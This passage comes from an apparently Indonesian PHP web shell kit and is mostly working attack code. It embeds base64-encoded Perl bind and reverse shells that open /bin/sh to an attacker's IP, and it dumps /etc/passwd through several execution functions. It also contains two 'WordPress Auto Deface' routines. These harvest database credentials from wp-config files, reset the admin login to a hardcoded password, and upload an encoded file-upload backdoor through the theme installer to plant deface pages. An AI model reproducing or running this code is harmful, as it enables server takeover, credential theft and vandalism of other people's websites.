nIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT4NCjxwPjxjZW50ZXI+SWYgbm90aGluZyB3b3JrIGl0IG1lYW5zIHRoYXQgcGVybCBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcGVybCByZXZlcnNlLnBsIHlvdXJJUCBQb3J0PC9zdHJvbmc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InZ3IiBzaXplPSI1MCIgdmFsdWU9ImNtZCI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb21tYW5kIiBzaXplPSI0MyI+IDxzZWxlY3QgbmFtZT1leGVjbWV0aG9kPg0KPG9wdGlvbiB2YWx1ZT0ic3lzdGVtIj5TeXN0ZW08L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9ImV4ZWMiPkV4ZWM8L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9InBhc3N0aHJ1Ij5QYXNzdGhydTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9InBvcGVuIj5wb3Blbjwvb3B0aW9uPg0KPC9zZWxlY3Q+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFeGVjdXRlIj4NCjwvcD48L2Zvcm0+JzsNCj8+';
  3714.     $file = fopen("kit.php" ,"w+");
  3715.     $write = fwrite ($file ,base64_decode($zonop));
  3716.     fclose($file);
  3717.  
  3718.     echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Perl Connect Shell Priv8</span></b><center><br><iframe src=Backperlrev/kit.php width=75% height=60% frameborder=0></iframe></div></center>";
  3719.  
  3720. }
  3721. elseif($_GET['do'] == 'bc') {
  3722. echo "<center>";
  3723. echo "<ul>";
  3724. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3725. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3726. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3727. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3728. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3729. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3730. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3731. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3732. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3733. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3734. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3735. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3736. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3737. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3738. echo "</ul>";
  3739. echo "</center>";
  3740.     echo "<form method='post'>
  3741.     <u>Bind Port:</u> <br>
  3742.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3743.     <input type='submit' name='sub_bp' value='>>'>
  3744.     </form>
  3745.     <form method='post'>
  3746.     <u>Back Connect:</u> <br>
  3747.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3748.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3749.     <input type='submit' name='sub_bc' value='>>'>
  3750.     </form>";
  3751.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3752.     if(isset($_POST['sub_bp'])) {
  3753.         $f_bp = fopen("/tmp/bp.pl", "w");
  3754.         fwrite($f_bp, base64_decode($bind_port_p));
  3755.         fclose($f_bp);
  3756.  
  3757.         $port = $_POST['port_bind'];
  3758.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3759.         sleep(1);
  3760.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3761.         unlink("/tmp/bp.pl");
  3762.     }
  3763.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3764.     if(isset($_POST['sub_bc'])) {
  3765.         $f_bc = fopen("/tmp/bc.pl", "w");
  3766.         fwrite($f_bc, base64_decode($bind_connect_p));
  3767.         fclose($f_bc);
  3768.  
  3769.         $ipbc = $_POST['ip_bc'];
  3770.         $port = $_POST['port_bc'];
  3771.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3772.         sleep(1);
  3773.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3774.         unlink("/tmp/bc.pl");
  3775.     }
  3776. } elseif($_GET['do'] == 'adminer') {
  3777.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3778.     function adminer($url, $isi) {
  3779.         $fp = fopen($isi, "w");
  3780.         $ch = curl_init();
  3781.               curl_setopt($ch, CURLOPT_URL, $url);
  3782.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3783.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3784.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3785.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3786.         return curl_exec($ch);
  3787.               curl_close($ch);
  3788.         fclose($fp);
  3789.         ob_flush();
  3790.         flush();
  3791.     }
  3792.     if(file_exists('adminer.php')) {
  3793.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3794.     } else {
  3795.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3796.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3797.         } else {
  3798.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3799.         }
  3800.     }
  3801. }elseif($_GET['do'] == 'passwbypass') {
  3802.     echo '<center>Bypass etc/passw With:<br>
  3803. <table style="width:50%">
  3804.   <tr>
  3805.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3806.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3807.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  3808.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  3809.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3810. </tr></table>Bypass User With : <table style="width:50%">
  3811. <tr>
  3812.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3813.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3814.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3815.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  3816.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3817. </tr>
  3818. </table><br>';
  3819.  
  3820.  
  3821. if ($_POST['awkuser']) {
  3822. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3823. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3824. echo "</textarea><br>";
  3825. }
  3826. if ($_POST['systuser']) {
  3827. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3828. echo system("ls /var/mail");
  3829. echo "</textarea><br>";
  3830. }
  3831. if ($_POST['passthuser']) {
  3832. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3833. echo passthru("ls /var/mail");
  3834. echo "</textarea><br>";
  3835. }
  3836. if ($_POST['exuser']) {
  3837. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3838. echo exec("ls /var/mail");
  3839. echo "</textarea><br>";
  3840. }
  3841. if ($_POST['shexuser']) {
  3842. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3843. echo shell_exec("ls /var/mail");
  3844. echo "</textarea><br>";
  3845. }
  3846. if($_POST['syst'])
  3847. {
  3848. echo"<textarea class='inputz' cols='65' rows='15'>";
  3849. echo system("cat /etc/passwd");
  3850. echo"</textarea><br><br><b></b><br>";
  3851. }
  3852. if($_POST['passth'])
  3853. {
  3854. echo"<textarea class='inputz' cols='65' rows='15'>";
  3855. echo passthru("cat /etc/passwd");
  3856. echo"</textarea><br><br><b></b><br>";
  3857. }
  3858. if($_POST['ex'])
  3859. {
  3860. echo"<textarea class='inputz' cols='65' rows='15'>";
  3861. echo exec("cat /etc/passwd");
  3862. echo"</textarea><br><br><b></b><br>";
  3863. }
  3864. if($_POST['shex'])
  3865. {
  3866. echo"<textarea class='inputz' cols='65' rows='15'>";
  3867. echo shell_exec("cat /etc/passwd");
  3868. echo"</textarea><br><br><b></b><br>";
  3869. }
  3870. echo '<center>';
  3871. if($_POST['melex'])
  3872. {
  3873. echo"<textarea class='inputz' cols='65' rows='15'>";
  3874. for($uid=0;$uid<60000;$uid++){
  3875. $ara = posix_getpwuid($uid);
  3876. if (!empty($ara)) {
  3877. while (list ($key, $val) = each($ara)){
  3878. print "$val:";
  3879. }
  3880. print "\n";
  3881. }
  3882. }
  3883. echo"</textarea><br><br>";
  3884. }
  3885. //
  3886.  
  3887. //
  3888. } elseif($_GET['do'] == 'auto_dwp') {
  3889.     if($_POST['auto_deface_wp']) {
  3890.         function anucurl($sites) {
  3891.             $ch = curl_init($sites);
  3892.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3893.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3894.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3895.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3896.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3897.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3898.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3899.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3900.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3901.             $data = curl_exec($ch);
  3902.                   curl_close($ch);
  3903.             return $data;
  3904.         }
  3905.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3906.             $post = array(
  3907.                    "log" => "$userr",
  3908.                    "pwd" => "$pass",
  3909.                    "rememberme" => "forever",
  3910.                    "wp-submit" => "$wp_submit",
  3911.                    "redirect_to" => "$web",
  3912.                    "testcookie" => "1",
  3913.                    );
  3914.             $ch = curl_init($cek);
  3915.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3916.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3917.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3918.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3919.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3920.                   curl_setopt($ch, CURLOPT_POST, 1);
  3921.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3922.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3923.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3924.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3925.             $data = curl_exec($ch);
  3926.                   curl_close($ch);
  3927.             return $data;
  3928.         }
  3929.         $scan = $_POST['link_config'];
  3930.         $link_config = scandir($scan);
  3931.         $script = htmlspecialchars($_POST['script']);
  3932.         $user = "root@1337";
  3933.         $pass = "root@1337";
  3934.         $passx = md5($pass);
  3935.         foreach($link_config as $dir_config) {
  3936.             if(!is_file("$scan/$dir_config")) continue;
  3937.             $config = file_get_contents("$scan/$dir_config");
  3938.             if(preg_match("/WordPress/", $config)) {
  3939.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3940.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3941.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3942.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3943.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3944.                 $prefix = $dbprefix."users";
  3945.                 $option = $dbprefix."options";
  3946.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3947.                 $db = mysql_select_db($dbname);
  3948.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3949.                 $result = mysql_fetch_array($q);
  3950.                 $id = $result[ID];
  3951.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3952.                 $result2 = mysql_fetch_array($q2);
  3953.                 $target = $result2[option_value];
  3954.                 if($target == '') {                
  3955.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3956.                 } else {
  3957.                     echo "[+] $target <br>";
  3958.                 }
  3959.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3960.                 if(!$conn OR !$db OR !$update) {
  3961.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3962.                     mysql_close($conn);
  3963.                 } else {
  3964.                     $site = "$target/wp-login.php";
  3965.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3966.                     $b1 = anucurl($site2);
  3967.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3968.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3969.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3970.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3971.                     $www = "m.php";
  3972.                     $fp5 = fopen($www,"w");
  3973.                     fputs($fp5,$upload3);
  3974.                     $post2 = array(
  3975.                             "_wpnonce" => "$anu2",
  3976.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3977.                             "themezip" => "@$www",
  3978.                             "install-theme-submit" => "Install Now",
  3979.                             );
  3980.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3981.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3982.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3983.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3984.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3985.                           curl_setopt($ch, CURLOPT_POST, 1);
  3986.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3987.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3988.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3989.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3990.                     $data3 = curl_exec($ch);
  3991.                           curl_close($ch);
  3992.                     $y = date("Y");
  3993.                     $m = date("m");
  3994.                     $namafile = "id.php";
  3995.                     $fpi = fopen($namafile,"w");
  3996.                     fputs($fpi,$script);
  3997.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3998.                            curl_setopt($ch6, CURLOPT_POST, true);
  3999.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4000.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4001.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4002.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4003.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  4004.                     $postResult = curl_exec($ch6);
  4005.                            curl_close($ch6);
  4006.                     $as = "$target/k.php";
  4007.                     $bs = anucurl($as);
  4008.                     if(preg_match("#$script#is", $bs)) {
  4009.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4010.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4011.                         } else {
  4012.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  4013.                         echo "[!!] coba aja manual: <br>";
  4014.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4015.                         echo "[+] username: <font color=lime>$user</font><br>";
  4016.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  4017.                         }
  4018.                     mysql_close($conn);
  4019.                 }
  4020.             }
  4021.         }
  4022.     } else {
  4023.         echo "<center><h1>WordPress Auto Deface</h1>
  4024.         <form method='post'>
  4025.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  4026.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4027.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4028.         </form>
  4029.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  4030.         </center>";
  4031.     }
  4032. } elseif($_GET['do'] == 'auto_dwp2') {
  4033.     if($_POST['auto_deface_wp']) {
  4034.         function anucurl($sites) {
  4035.             $ch = curl_init($sites);
  4036.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4037.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4038.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4039.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  4040.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4041.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4042.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4043.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4044.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  4045.             $data = curl_exec($ch);
  4046.                   curl_close($ch);
  4047.             return $data;
  4048.         }
  4049.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  4050.             $post = array(
  4051.                    "log" => "$userr",
  4052.                    "pwd" => "$pass",
  4053.                    "rememberme" => "forever",
  4054.                    "wp-submit" => "$wp_submit",
  4055.                    "redirect_to" => "$web",
  4056.                    "testcookie" => "1",
  4057.                    );
  4058.             $ch = curl_init($cek);
  4059.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4060.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4061.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  4062.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4063.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4064.                   curl_setopt($ch, CURLOPT_POST, 1);
  4065.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  4066.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4067.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4068.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4069.             $data = curl_exec($ch);
  4070.                   curl_close($ch);
  4071.             return $data;
  4072.         }
  4073.         $link = explode("\r\n", $_POST['link']);
  4074.         $script = htmlspecialchars($_POST['script']);
  4075.         $user = "root@1337";
  4076.         $pass = "root@1337";
  4077.         $passx = md5($pass);
  4078.         foreach($link as $dir_config) {
  4079.             $config = anucurl($dir_config);
  4080.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  4081.             $dbuser = ambilkata($config,"DB_USER', '","'");
  4082.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4083.             $dbname = ambilkata($config,"DB_NAME', '","'");
  4084.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  4085.             $prefix = $dbprefix."users";
  4086.             $option = $dbprefix."options";
  4087.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4088.             $db = mysql_select_db($dbname);
  4089.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4090.             $result = mysql_fetch_array($q);
  4091.             $id = $result[ID];
  4092.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4093.             $result2 = mysql_fetch_array($q2);
  4094.             $target = $result2[option_value];
  4095.             if($target == '') {                
  4096.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  4097.             } else {
  4098.                 echo "[+] $target <br>";
  4099.             }
  4100.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  4101.             if(!$conn OR !$db OR !$update) {
  4102.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  4103.                 mysql_close($conn);
  4104.             } else {
  4105.                 $site = "$target/wp-login.php";
  4106.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  4107.                 $b1 = anucurl($site2);
  4108.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  4109.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  4110.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  4111.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  4112.                 $www = "m.php";
  4113.                 $fp5 = fopen($www,"w");
  4114.                 fputs($fp5,$upload3);
  4115.                 $post2 = array(
  4116.                         "_wpnonce" => "$anu2",
  4117.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  4118.                         "themezip" => "@$www",
  4119.                         "install-theme-submit" => "Install Now",
  4120.                         );
  4121.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  4122.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4123.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4124.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4125.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4126.                       curl_setopt($ch, CURLOPT_POST, 1);
  4127.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  4128.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4129.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4130.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4131.                 $data3 = curl_exec($ch);
  4132.                       curl_close($ch);
  4133.                 $y = date("Y");
  4134.                 $m = date("m");
  4135.                 $namafile = "id.php";
  4136.                 $fpi = fopen($namafile,"w");
  4137.                 fputs($fpi,$script);
  4138.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4139.                        curl_setopt($ch6, CURLOPT_POST, true);
  4140.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4141.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  4142.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  4143.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  4144.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  4145.                 $postResult = curl_exec($ch6);
  4146.                        curl_close($ch6);
  4147.                 $as = "$target/k.php";
  4148.                 $bs = anucurl($as);
  4149.                 if(preg_match("#$script#is", $bs)) {
  4150.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  4151.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  4152.                     } else {
  4153.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  4154.                     echo "[!!] coba aja manual: <br>";
  4155.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  4156.                     echo "[+] username: <font color=lime>$user</font><br>";
  4157.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  4158.                     }
  4159.                 mysql_close($conn);
  4160.             }
  4161.         }
  4162.     } else {
  4163.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  4164.         <form method='post'>
  4165.         Link Config: <br>
  4166.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  4167.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.ToKeiChun69' required><br>
  4168.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  4169.         </form></center>";
  4170.     }
  4171. } elseif($_GET['act'] == 'newfile') {
  4172.     if($_POST['new_save_file']) {
  4173.         $newfile = htmlspecialchars($_POST['newfile']);
  4174.         $fopen = fopen($newfile, "a+");
  4175.         if($fopen) {
  4176.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  4177.         } else {
  4178.             $act = "<font color=red>permission denied</font>";
  4179.         }
  4180.     }
  4181.     echo $act;
  4182.     echo "<form method='post'>
  4183.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  4184.     <input type='submit' name='new_save_file' value='Submit'>
  4185.     </form>";
  4186. } elseif($_GET['act'] == 'newfolder') {
  4187.     if($_POST['new_save_folder']) {
  4188.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  4189.         if(!mkdir($new_folder)) {
  4190.             $act = "<font color=red>permission denied</font>";
  4191.         } else {
  4192.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4193.         }
  4194.     }
  4195.     echo $act;
  4196.     echo "<form method='post'>
  4197.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  4198.     <input type='submit' name='new_save_folder' value='Submit'>
  4199.     </form>";
  4200. } elseif($_GET['act'] == 'rename_dir') {
  4201.     if($_POST['dir_rename']) {
  4202.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
